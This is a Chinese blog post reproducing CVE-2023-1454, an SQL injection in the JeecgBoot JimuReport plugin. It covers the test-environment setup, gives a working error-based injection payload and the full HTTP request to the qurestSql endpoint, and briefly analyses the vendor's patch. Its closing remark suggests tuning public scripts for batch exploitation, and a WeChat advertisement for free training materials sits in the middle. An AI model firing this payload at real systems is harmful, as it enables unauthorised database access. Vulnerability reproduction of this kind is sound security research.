CVE-2023-1454注入分析复现
简介
JeecgBoot的代码生成器是一种可以帮助开发者快速构建企业级应用的工具,它可以通过一键生成前后端代码,无需写任何代码,让开发者更多关注业务逻辑。
影响版本
Jeecg-Boot<=3.5.1
环境搭建
idea+
后端源码:
https://github.com/jeecgboot/jeecg-boot/archive/refs/tags/v3.5.0.zip
前端源码:
https://github.com/jeecgboot/jeecgboot-vue3/archive/refs/tags/v3.5.0.zip
安装npm
,安装nodejs
安装yarn
npm install -g yarn
下载依赖
yarn install
yarn run serve //起服务
由于是前后端分离,需要数据库导入表,使用navicat直接导入即可
后端服务端搭建,使用idea搭建导入项目,修改数据库配置
配置server端npm服务
配置好之后直接启动,访问
搭建成功
【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)
漏洞复现
前后端分离,后端端口8080 ,Payload:
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Content-Type: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Length: 128
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
分析
漏洞产生点位于积木报表插件内,查看更新的3.5.1的版本更新
更改了72处的文件,其中需要注意db/其他数据库/jeecgboot-sqlserver2019.sql
中重写了数据插入的方法
jeecg-boot-base-core/src/main/java/org/jeecg/common/util/SqlInjectionUtil.java
中增加了对sql语句的正则
这个修复是针对于后端的SQL注入,/sys/duplicate/check
目前最新更新的3.5.1版本似乎依旧没有针对积木报表注入点儿的加固措施,修复时更换jar包
目前积木官方的jar包已升级。
关注积木5月份的升级日志
小结
github上有师傅们的脚本,但是如果要批量使用的话建议在修改一下response的内容,仅仅只有操作失败的报错的话会存在大批量的报错。
所有自定义的if判断的回显都建议修改一下,如有错误欢迎指出。
更多网安技能的在线实操练习,请点击这里>>